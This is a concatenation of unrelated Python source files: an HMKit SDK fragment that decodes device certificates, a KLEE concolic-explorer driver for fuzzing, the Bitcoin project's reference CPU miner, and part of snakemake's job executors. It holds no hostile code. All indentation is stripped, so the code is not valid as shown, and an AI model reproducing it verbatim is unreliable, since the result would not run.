devCerts_decoded.append(base64.b64decode(devCerts_snippet[0]))
devCerts_decoded.append(base64.b64decode(devCerts_snippet[1]))
devCerts_decoded.append(base64.b64decode(devCerts_snippet[2]))
#------- Dev Cert ------
##log.debug("DevCert decoded, len: " + str(len(devCerts_decoded[0])) + " type: " + str(type(devCerts_decoded[0])) + " Array: " + str(devCerts_decoded[0]))
list_devCerts_decoded = list(devCerts_decoded[0])
bytes_devCerts_decoded = bytes(list_devCerts_decoded)
#log.debug("DevCert decoded List, len: " + str(len(list_devCerts_decoded)) + " type: " + str(type(list_devCerts_decoded)) + " Array: " + str(list_devCerts_decoded))
#log.debug("DevCert decoded Bytes, len: " + str(len(bytes_devCerts_decoded)) + " type: " + str(type(bytes_devCerts_decoded)) + " Array: " + str(bytes_devCerts_decoded))
#-------- Prv -------
#log.debug("Prv decoded, len: " + str(len(devCerts_decoded[1])) + " type: " + str(type(devCerts_decoded[1])) + " Array: " + str(devCerts_decoded[1]))
list_prv_decoded = list(devCerts_decoded[1])
bytes_prv_decoded = bytes(list_prv_decoded)
#log.debug("DevCert decoded List, len: " + str(len(list_prv_decoded)) + " type: " + str(type(list_prv_decoded)) + " Array: " + str(list_prv_decoded))
#log.debug("Prv decoded Bytes, len: " + str(len(bytes_prv_decoded)) + " type: " + str(type(bytes_prv_decoded)) + " Array: " + str(bytes_prv_decoded))
#---------- Pub -------
#log.debug("Prv decoded, len: " + str(len(devCerts_decoded[2])) + " type: " + str(type(devCerts_decoded[2])) + " Array: " + str(devCerts_decoded[2]))
list_pub_decoded = list(devCerts_decoded[2])
bytes_pub_decoded = bytes(list_pub_decoded)
#log.debug("Pub decoded List, len: " + str(len(list_pub_decoded)) + " type: " + str(type(list_pub_decoded)) + " Array: " + str(list_pub_decoded))
#log.debug("Pub decoded Bytes, len: " + str(len(bytes_pub_decoded)) + " type: " + str(type(bytes_pub_decoded)) + " Array: " + str(bytes_pub_decoded))
#print("DevPrv decoded, len: ",len(devCerts_decoded[1]) ," Array: ", devCerts_decoded[1])
h_string2 = codecs.encode(devCerts_decoded[1], 'hex')
#print("Hex, len: ", len(h_string2), " Value: ", h_string2)
#print("IssPub decoded, len: ",len(devCerts_decoded[2]) ," Array: ", devCerts_decoded[2])
h_string3 = codecs.encode(devCerts_decoded[2], 'hex')
#print("Hex, len: ", len(h_string3), " Value: ", h_string3)
self.device_certificate.update_devcertf(bytes_devCerts_decoded)
ret = hm_pyc.set_certs(bytes_devCerts_decoded, bytes_prv_decoded, bytes_pub_decoded)
def download_access_certificate(self, token):
"""
Pass the Access token to :class:`access_certificate` to download Access Certificate
:param bytearray token: Access Token for device
:rtype: None
"""
self.access_certificate.download_access_certificate(token)
self.storage.store_access_certificate(self.access_certificate.get_raw_certiticate(), self.access_certificate.get_gaining_serial_number())
######## for Testing
ac = self.storage.get_access_certificate(self.access_certificate.get_gaining_serial_number())
#print("Received AC from Storage: " + str(ac))
#ret = self.storage.delete_access_certificate(self.access_certificate.get_gaining_serial_number())
#print("Deleted AC from Storage: ")
########
def get_certificate(self, serial):
"""
returns the Access Certificate
:param bytearray serial: Serial Number
:returns: AccessCertificate() object that contains the received Access certificate
:rtype: access_certificate.AccessCertificate()
"""
#print("HMKT: " + "get_certificate()")
# TODO: get it from storage based on the serial number
return self.access_certificate
#-------------------------------------------------
#--------------------- Init ----------------------
#-------------------------------------------------
def __init__(self, snippet, loglevel=logging.INFO):
"""
Main :class: HmKit _init_ to initialize and access High mobility Python sdk hmkit
:param bytearray snippet: Device certificate snippet downloaded from developer centre
:param logging loglevel: python logging level for hmkit logs. logging.DEBUG, logging.INFO, logging.WARNING ,logging.ERROR, logging.CRITICAL
:rtype: None
"""
global listener
##print("PY: Init Function of HmKit")
logger.setLevel(loglevel)
# Virtually private constructor
if HmKit.__instance != None:
raise Exception("This class is a singleton!")
else:
HmKit.__instance = self
# access certificate and device certificate class objects
self.access_certificate = access_certificate.AccessCertificate(self)
self.device_certificate = device_certificate.DeviceCertificate(self)
self.storage = storage.Storage(self)
# update the received certificate snippet
self.certificate_update(snippet)
# Initialize Pyhton threads
self.init_threads()
# set python c interface module
self.hm_pyc = hm_pyc
# set bluetooth interface module
self.bluetooth = bluetooth.Bluetooth(self.hm_pyc)
# set autoapidump module
self.autoapi_dump = autoapi_dump()
|
klee_conc_explorer.py
|
import ConfigParser
import multiprocessing
import subprocess32 as subprocess
import os
import sys
import utils
import signal
from utils import bcolors
def se_info(s):
print bcolors.HEADER+"[KleeConc-Info]"+bcolors.ENDC," {0}".format(s)
class ConcExplorer:
def __init__(self, config, target):
self.jobs = {}
self.started_jobs = set()
self.config = config
self.target = target
self.get_config()
utils.mkdir_force(self.seed_dir)
self.pid_ctr = 0
se_info("Concolic Explorer using searcher[{0}]".format(''.join(self.get_search_heuristics())))
def get_config(self):
config = ConfigParser.ConfigParser()
config.read(self.config)
self.bin = config.get("klee conc_explorer", "bin")
self.converter = config.get("klee conc_explorer","converter")
self.seed_dir = config.get("klee conc_explorer", "klee_seed_dir").replace("@target", self.target)
self.search_heuristics = config.get("klee conc_explorer", "search_heuristic").split(":")
self.target_bc = config.get("klee conc_explorer", "target_bc").replace("@target", self.target).split()[0]
self.options = config.get("klee conc_explorer", "target_bc").replace("@target", self.target).split()[1:]
self.klee_err_dir = config.get("klee conc_explorer", "error_dir").replace("@target", self.target)
try:
self.free_mode = True if config.get("klee conc_explorer", "free_mode") == "True" else False
except Exception:
print "Using default free mode value"
self.free_mode = False
try:
self.optimistic_solving = True if config.get("klee conc_explorer", "optimistic") == "True" else False
except Exception:
print "Using default optimisitc mode"
self.optimistic_solving = False
try:
self.max_time_per_seed = config.get("klee conc_explorer", "max_time_per_seed")
except Exception:
# by default no time limit per seed.
self.max_time_per_seed = 0
try:
self.max_output = config.get("klee conc_explorer", "max_interesting_output")
except Exception:
self.max_output = None
try:
self.savior_use_ubsan = True if config.get("klee conc_explorer", "savior_use_ubsan") == "True" else False
except Exception:
self.savior_use_ubsan = False
try:
self.max_mem = config.get("klee conc_explorer", "max_memory")
except Exception:
self.max_mem = str(1024*1024*20) # in kbytes
try:
self.max_loop_bounds = config.get("klee conc_explorer", "max_loop_bounds")
except Exception:
self.max_loop_bounds = None
self.bitmodel = config.get("moriarty", "bitmodel")
self.input_type = 'symfile' if '@@' in self.options else 'stdin'
self.sync_dir_base = config.get("moriarty", "sync_dir").replace("@target", self.target)
if "AFLUnCovSearcher" in self.get_search_heuristics():
self.fuzzer_cov_file = config.get("auxiliary info", "cov_edge_file").replace("@target", self.target)
#only replay seed is only optional in concolic mode
try:
self.only_replay_seed = True if config.get("klee conc_explorer", "only_replay_seed") == '1' else False
except Exception:
self.only_replay_seed= False
#handling cxx options
try:
self.klee_ctor_stub = True if config.get("klee conc_explorer", "klee_ctor_stub") == '1' else False
except Exception:
self.klee_ctor_stub = False
try:
self.klee_uclibcxx = True if config.get("klee conc_explorer", "klee_uclibcxx") == '1' else False
except Exception:
self.klee_uclibcxx = False
def __repr__(self):
return "SE Engine: KLEE Concolic Explorer"
def get_search_heuristics(self):
"""return a list of search heuristics"""
return self.search_heuristics
def __repr__(self):
return "SE Engine: KLEE Symbolic Explorer"
def exceed_mem_limit(self):
pass
def alive(self):
alive = False
multiprocessing.active_children()
for pid in [self.jobs[x]['real_pid'] for x in self.jobs]:
try:
os.kill(pid, 0)
print "conc_explorer pid: {0} is alive".format(pid)
alive = True
except Exception:
print "conc_explorer pid: {0} not alive".format(pid)
return alive
def run(self, input_id_map_list, cov_file):
"""
-create seed-out-dir
For each input,
-convert ktest move to seed-out-dir
-create sync dir
-build cmd
-create new process job
"""
pid = self.get_new_pid()
klee_seed_dir = self.seed_dir + "/klee_instance_conc_"+str(pid)
utils.mkdir_force(klee_seed_dir)
input_counter = 0
max_input_size = 0
se_info("{0} activated. input list : {1}".format(self, [x['input'] for x in input_id_map_list]))
se_info("{0} activated. input score : {1}".format(self, [x['score'] for x in input_id_map_list]))
try:
se_info("{0} activated. input size: {1}".format(self, [x['size'] for x in input_id_map_list]))
except Exception:
pass
for input_id_map in input_id_map_list:
#--generate klee seed ktest
# print input_id_map
afl_input = input_id_map['input']
if max_input_size < os.path.getsize(afl_input):
max_input_size = os.path.getsize(afl_input)
klee_seed = klee_seed_dir+"/"+str(input_counter).zfill(6)+".ktest"
# print "before calling converter"
self.call_converter("a2k", afl_input, klee_seed, self.bitmodel, self.input_type)
input_counter += 1
if not os.path.exists(klee_seed):
print "no seed" + klee_seed
continue
#--create sync_dir for new klee instance
key = "klee_instance_conc_" + str(pid).zfill(6)
new_sync_dir = self.sync_dir_base+"/"+key+"/queue"
utils.mkdir_force(new_sync_dir)
#--build klee instance cmd
edge_ids = [x for x in input_id_map['interesting_edges']]
klee_cmd = self.build_cmd(klee_seed_dir, edge_ids, new_sync_dir, max_input_size, afl_input, cov_file)
print ' '.join(klee_cmd)
#--construct process meta data, add to jobs list
kw = {'mock_eof':True, 'mem_cap': self.max_mem, 'use_shell':True}
p = multiprocessing.Process(target=utils.exec_async, args=[klee_cmd], kwargs=kw)
p.daemon = True
task_st = {}
task_st['instance'] = p
task_st['sync_dir'] = new_sync_dir
task_st['seed'] = klee_seed
task_st['cmd'] = klee_cmd
if "AFLUnCovSearcher" in self.get_search_heuristics():
task_st['afl_cov'] = self.fuzzer_cov_file
self.jobs[pid] = task_st
for pid, task in self.jobs.iteritems():
try:
if pid not in self.started_jobs:
task['instance'].start()
task['real_pid'] = task['instance'].pid
# print "starting klee process: ", task['real_pid']
self.started_jobs.add(pid)
else:
se_info("WTF the process {0} is already started".format(pid))
except Exception:
pass
return (key, [x['input'] for x in input_id_map_list])
def stop(self):
"""
Terminate all jobs,
you could have more fine-grained control by extending this function
"""
se_info("{0} deactivated".format(self))
for pid, task in self.jobs.iteritems():
se_info("Terminting klee instance: {0} {1} real pid:{2}".format(pid, task['instance'], task['real_pid']))
utils.terminate_proc_tree(task['real_pid'])
#reset jobs queue
self.jobs = {}
# self.started_jobs= set()
def build_cmd(self, ktest_seed_dir, edge_ids, sync_dir, max_len, afl_input, out_cov_file):
"""
each afl_testcase will have a list of branch ids,
we use these info to construct the command for
starting a new klee instance
by default:
use klee's own searching algo
if specified afl_uncov in config, use AFLUnCovSearcher
"""
cmd = []
afl_uncov = "--afl-covered-branchid-file="
klee_out_uncov = "--klee-covered-branchid-outfile="
sync_dir_flag = "--sync-dir="
stdin_sym_flag = "--sym-stdin"
file_sym_flag = "--sym-files"
max_time_per_seed_flag = "--max-time-per-seed="
sanitizer_searcher_flag = "--edge-sanitizer-heuristic"
remove_uninterested_edge_flag = "-remove-unprioritized-states"
if self.klee_uclibcxx == True:
klee_libc = "--libc=uclibcxx"
else:
klee_libc = "--libc=uclibc"
if self.klee_ctor_stub == True:
klee_ctor_stub="--disable-inject-ctor-and-dtor=false"
else:
klee_ctor_stub="--disable-inject-ctor-and-dtor=true"
# max_solve_time = "-max-solver-time=100"
common_prefix = [self.bin,
klee_libc,
klee_ctor_stub,
"--posix-runtime",
"--concolic-explorer=true",
"--named-seed-matching=true",
"--allow-external-sym-calls",
"--use-non-intrinsics-memops=false",
"--check-overshift=false",
"--solver-backend=z3",
"--max-solver-time=5",
"--disable-bound-check=true",
"--disable-ubsan-check=true",
remove_uninterested_edge_flag,
]
if self.free_mode == True:
common_prefix.append("--free-mode=true")
else:
common_prefix.append("--free-mode=false")
common_prefix.append("--fixup-afl-ids=true")
if self.optimistic_solving == True:
common_prefix.append("--relax-constraint-solving=true")
else:
common_prefix.append("--relax-constraint-solving=false")
if self.savior_use_ubsan == True:
common_prefix.append("--savior-ubsan=true")
else:
common_prefix.append("--savior-ubsan=false")
common_prefix.append("--max-memory=0")
common_prefix.append(max_time_per_seed_flag+self.max_time_per_seed)
if self.max_loop_bounds != None:
common_prefix.append("--max-loop-bounds="+self.max_loop_bounds)
if "AFLUnCovSearcher" in self.get_search_heuristics():
common_prefix.append(afl_uncov + self.fuzzer_cov_file)
common_prefix.append(klee_out_uncov + out_cov_file)
if "SANGuidedSearcher" in self.get_search_heuristics():
common_prefix.append(sanitizer_searcher_flag)
cmd.extend(common_prefix);
cmd.append("--seed-out-dir=" + ktest_seed_dir)
cmd.append(sync_dir_flag + sync_dir)
cmd.append(self.target_bc)
new_options = list(self.options)
for _ in xrange(len(new_options)):
if new_options[_] == "@@":
new_options[_] = "A"
cmd.extend(new_options)
if self.input_type == "stdin":
cmd.append(stdin_sym_flag)
cmd.append(str(max_len))
else:
if not "@@" in self.options:
cmd.append("A")
cmd.append(file_sym_flag)
cmd.append("1")
cmd.append(str(max_len))
return cmd
def get_new_pid(self):
self.pid_ctr += 1
return self.pid_ctr
def call_converter(self, mode, afl_input, ktest, bitmodel, inputtype):
"""
SEs directly invoke the converter to
convert between the afl/klee file formats
as the SE input format is specific to target SE engine
"""
args = [];
args.append(self.converter)
args.append("--mode="+ mode)
args.append("--afl-name="+afl_input)
args.append("--ktest-name="+ktest)
args.append("--bitmodel="+bitmodel);
args.append("--inputmode="+inputtype);
subprocess.Popen(args).wait()
def terminate_callback(self):
"""called when SIGINT and SIGTERM"""
se_info("packing klee error cases into [{0}]".format(self.klee_err_dir))
utils.pack_klee_errors(self.target, self.klee_err_dir)
def periodic_callback(self):
"""called every 1 hour"""
se_info("packing klee error cases into [{0}]".format(self.klee_err_dir))
utils.pack_klee_errors(self.target, self.klee_err_dir)
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 28213
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
executors.py
|
__author__ = "Johannes Köster"
__copyright__ = "Copyright 2015-2019, Johannes Köster"
__email__ = "koester@jimmy.harvard.edu"
__license__ = "MIT"
import os
import sys
import contextlib
import time
import datetime
import json
import textwrap
import stat
import shutil
import shlex
import threading
import concurrent.futures
import subprocess
import signal
from functools import partial
from itertools import chain
from collections import namedtuple
from tempfile import mkdtemp
from snakemake.io import _IOFile
import random
import base64
import uuid
import re
import math
from snakemake.jobs import Job
from snakemake.shell import shell
from snakemake.logging import logger
from snakemake.stats import Stats
from snakemake.utils import format, Unformattable, makedirs
from snakemake.io import get_wildcard_names, Wildcards
from snakemake.exceptions import print_exception, get_exception_origin
from snakemake.exceptions import format_error, RuleException, log_verbose_traceback
from snakemake.exceptions import (
ProtectedOutputException,
WorkflowError,
ImproperShadowException,
SpawnedJobError,
CacheMissException,
)
from snakemake.common import Mode, __version__, get_container_image, get_uuid
def sleep():
# do not sleep on CI. In that case we just want to quickly test everything.
if os.environ.get("CI") != "true":
time.sleep(10)
class AbstractExecutor:
def __init__(
self,
workflow,
dag,
printreason=False,
quiet=False,
printshellcmds=False,
printthreads=True,
latency_wait=3,
keepincomplete=False,
):
self.workflow = workflow
self.dag = dag
self.quiet = quiet
self.printreason = printreason
self.printshellcmds = printshellcmds
self.printthreads = printthreads
self.latency_wait = latency_wait
self.keepincomplete = keepincomplete
def get_default_remote_provider_args(self):
if self.workflow.default_remote_provider:
return (
" --default-remote-provider {} " "--default-remote-prefix {} "
).format(
self.workflow.default_remote_provider.__module__.split(".")[-1],
self.workflow.default_remote_prefix,
)
return ""
def get_default_resources_args(self):
if self.workflow.default_resources.args is not None:
def fmt(res):
if isinstance(res, str):
res = res.replace('"', r"\"")
return '"{}"'.format(res)
args = " --default-resources {} ".format(
" ".join(map(fmt, self.workflow.default_resources.args))
)
return args
return ""
def run(self, job, callback=None, submit_callback=None, error_callback=None):
self._run(job)
callback(job)
def shutdown(self):
pass
def cancel(self):
pass
def _run(self, job):
job.check_protected_output()
self.printjob(job)
def rule_prefix(self, job):
return "local " if job.is_local else ""
def printjob(self, job):
job.log_info(skip_dynamic=True)
def print_job_error(self, job, msg=None, **kwargs):
job.log_error(msg, **kwargs)
def handle_job_success(self, job):
pass
def handle_job_error(self, job):
pass
class DryrunExecutor(AbstractExecutor):
def printjob(self, job):
super().printjob(job)
if job.is_group():
for j in job.jobs:
self.printcache(j)
else:
self.printcache(job)
def printcache(self, job):
if self.workflow.is_cached_rule(job.rule):
if self.workflow.output_file_cache.exists(job):
logger.info(
"Output file {} will be obtained from global between-workflow cache.".format(
job.output[0]
)
)
else:
logger.info(
"Output file {} will be written to global between-workflow cache.".format(
job.output[0]
)
)
class RealExecutor(AbstractExecutor):
def __init__(
self,
workflow,
dag,
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
assume_shared_fs=True,
keepincomplete=False,
):
super().__init__(
workflow,
dag,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
keepincomplete=keepincomplete,
)
self.assume_shared_fs = assume_shared_fs
self.stats = Stats()
self.snakefile = workflow.snakefile
def register_job(self, job):
job.register()
def _run(self, job, callback=None, error_callback=None):
super()._run(job)
self.stats.report_job_start(job)
try:
self.register_job(job)
except IOError as e:
logger.info(
"Failed to set marker file for job started ({}). "
"Snakemake will work, but cannot ensure that output files "
"are complete in case of a kill signal or power loss. "
"Please ensure write permissions for the "
"directory {}".format(e, self.workflow.persistence.path)
)
def handle_job_success(
self,
job,
upload_remote=True,
handle_log=True,
handle_touch=True,
ignore_missing_output=False,
):
if not self.dag.is_edit_notebook_job(job):
job.postprocess(
upload_remote=upload_remote,
handle_log=handle_log,
handle_touch=handle_touch,
ignore_missing_output=ignore_missing_output,
latency_wait=self.latency_wait,
assume_shared_fs=self.assume_shared_fs,
)
self.stats.report_job_end(job)
def handle_job_error(self, job, upload_remote=True):
job.postprocess(
error=True,
assume_shared_fs=self.assume_shared_fs,
latency_wait=self.latency_wait,
)
def format_job_pattern(self, pattern, job=None, **kwargs):
overwrite_workdir = []
if self.workflow.overwrite_workdir:
overwrite_workdir.extend(("--directory", self.workflow.overwrite_workdir))
overwrite_config = []
if self.workflow.overwrite_configfiles:
# add each of the overwriting configfiles in the original order
if self.workflow.overwrite_configfiles:
overwrite_config.append("--configfiles")
overwrite_config.extend(self.workflow.overwrite_configfiles)
if self.workflow.config_args:
overwrite_config.append("--config")
overwrite_config.extend(self.workflow.config_args)
printshellcmds = ""
if self.workflow.printshellcmds:
printshellcmds = "-p"
if not job.is_branched and not job.is_updated:
# Restrict considered rules. This does not work for updated jobs
# because they need to be updated in the spawned process as well.
rules = ["--allowed-rules"]
rules.extend(job.rules)
else:
rules = []
target = kwargs.get("target", job.get_targets())
snakefile = kwargs.get("snakefile", self.snakefile)
cores = kwargs.get("cores", self.cores)
if "target" in kwargs:
del kwargs["target"]
if "snakefile" in kwargs:
del kwargs["snakefile"]
if "cores" in kwargs:
del kwargs["cores"]
return format(
pattern,
job=job,
attempt=job.attempt,
overwrite_workdir=overwrite_workdir,
overwrite_config=overwrite_config,
printshellcmds=printshellcmds,
workflow=self.workflow,
snakefile=snakefile,
cores=cores,
benchmark_repeats=job.benchmark_repeats if not job.is_group() else None,
target=target,
rules=rules,
**kwargs
)
class TouchExecutor(RealExecutor):
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
try:
# Touching of output files will be done by handle_job_success
time.sleep(0.1)
callback(job)
except OSError as ex:
print_exception(ex, self.workflow.linemaps)
error_callback(job)
def handle_job_success(self, job):
super().handle_job_success(job, ignore_missing_output=True)
_ProcessPoolExceptions = (KeyboardInterrupt,)
try:
from concurrent.futures.process import BrokenProcessPool
_ProcessPoolExceptions = (KeyboardInterrupt, BrokenProcessPool)
except ImportError:
pass
class CPUExecutor(RealExecutor):
def __init__(
self,
workflow,
dag,
workers,
printreason=False,
quiet=False,
printshellcmds=False,
use_threads=False,
latency_wait=3,
cores=1,
keepincomplete=False,
):
super().__init__(
workflow,
dag,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
keepincomplete=keepincomplete,
)
self.exec_job = "\\\n".join(
(
"cd {workflow.workdir_init} && ",
"{sys.executable} -m snakemake {target} --snakefile {snakefile} ",
"--force -j{cores} --keep-target-files --keep-remote ",
"--attempt {attempt} ",
"--force-use-threads --wrapper-prefix {workflow.wrapper_prefix} ",
"--latency-wait {latency_wait} ",
self.get_default_remote_provider_args(),
self.get_default_resources_args(),
"{overwrite_workdir} {overwrite_config} {printshellcmds} {rules} ",
"--notemp --quiet --no-hooks --nolock --mode {} ".format(
Mode.subprocess
),
)
)
if self.workflow.shadow_prefix:
self.exec_job += " --shadow-prefix {} ".format(self.workflow.shadow_prefix)
if self.workflow.use_conda:
self.exec_job += " --use-conda "
if self.workflow.conda_prefix:
self.exec_job += " --conda-prefix {} ".format(
self.workflow.conda_prefix
)
if self.workflow.use_singularity:
self.exec_job += " --use-singularity "
if self.workflow.singularity_prefix:
self.exec_job += " --singularity-prefix {} ".format(
self.workflow.singularity_prefix
)
if self.workflow.singularity_args:
self.exec_job += ' --singularity-args "{}"'.format(
self.workflow.singularity_args
)
if self.workflow.use_env_modules:
self.exec_job += " --use-envmodules"
self.use_threads = use_threads
self.cores = cores
# Zero thread jobs do not need a thread, but they occupy additional workers.
# Hence we need to reserve additional workers for them.
self.workers = workers + 5
self.pool = concurrent.futures.ThreadPoolExecutor(max_workers=self.workers)
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
if job.is_group():
# if we still don't have enough workers for this group, create a new pool here
missing_workers = max(len(job) - self.workers, 0)
if missing_workers:
self.workers += missing_workers
self.pool = concurrent.futures.ThreadPoolExecutor(
max_workers=self.workers
)
# the future waits for the entire group job
future = self.pool.submit(self.run_group_job, job)
else:
future = self.run_single_job(job)
future.add_done_callback(partial(self._callback, job, callback, error_callback))
def job_args_and_prepare(self, job):
job.prepare()
conda_env = job.conda_env_path if self.workflow.use_conda else None
container_img = (
job.container_img_path if self.workflow.use_singularity else None
)
env_modules = job.env_modules if self.workflow.use_env_modules else None
benchmark = None
benchmark_repeats = job.benchmark_repeats or 1
if job.benchmark is not None:
benchmark = str(job.benchmark)
return (
job.rule,
job.input._plainstrings(),
job.output._plainstrings(),
job.params,
job.wildcards,
job.threads,
job.resources,
job.log._plainstrings(),
benchmark,
benchmark_repeats,
conda_env,
container_img,
self.workflow.singularity_args,
env_modules,
self.workflow.use_singularity,
self.workflow.linemaps,
self.workflow.debug,
self.workflow.cleanup_scripts,
job.shadow_dir,
job.jobid,
self.workflow.edit_notebook,
)
def run_single_job(self, job):
if self.use_threads or (not job.is_shadow and not job.is_run):
future = self.pool.submit(
self.cached_or_run, job, run_wrapper, *self.job_args_and_prepare(job)
)
else:
# run directive jobs are spawned into subprocesses
future = self.pool.submit(self.cached_or_run, job, self.spawn_job, job)
return future
def run_group_job(self, job):
"""Run a pipe group job.
This lets all items run simultaneously."""
# we only have to consider pipe groups because in local running mode,
# these are the only groups that will occur
futures = [self.run_single_job(j) for j in job]
while True:
k = 0
for f in futures:
if f.done():
ex = f.exception()
if ex is not None:
# kill all shell commands of the other group jobs
# there can be only shell commands because the
# run directive is not allowed for pipe jobs
for j in job:
shell.kill(j.jobid)
raise ex
else:
k += 1
if k == len(futures):
return
time.sleep(1)
def spawn_job(self, job):
exec_job = self.exec_job
cmd = self.format_job_pattern(
exec_job, job=job, _quote_all=True, latency_wait=self.latency_wait
)
try:
subprocess.check_call(cmd, shell=True)
except subprocess.CalledProcessError as e:
raise SpawnedJobError()
def cached_or_run(self, job, run_func, *args):
"""
Either retrieve result from cache, or run job with given function.
"""
to_cache = self.workflow.is_cached_rule(job.rule)
try:
if to_cache:
self.workflow.output_file_cache.fetch(job)
return
except CacheMissException:
pass
run_func(*args)
if to_cache:
self.workflow.output_file_cache.store(job)
def shutdown(self):
self.pool.shutdown()
def cancel(self):
self.pool.shutdown()
def _callback(self, job, callback, error_callback, future):
try:
ex = future.exception()
if ex is not None:
raise ex
callback(job)
except _ProcessPoolExceptions:
self.handle_job_error(job)
# no error callback, just silently ignore the interrupt as the main scheduler is also killed
except SpawnedJobError:
# don't print error message, this is done by the spawned subprocess
error_callback(job)
except (Exception, BaseException) as ex:
self.print_job_error(job)
if not (job.is_group() or job.shellcmd) or self.workflow.verbose:
print_exception(ex, self.workflow.linemaps)
error_callback(job)
def handle_job_success(self, job):
super().handle_job_success(job)
def handle_job_error(self, job):
super().handle_job_error(job)
if not self.keepincomplete:
job.cleanup()
self.workflow.persistence.cleanup(job)
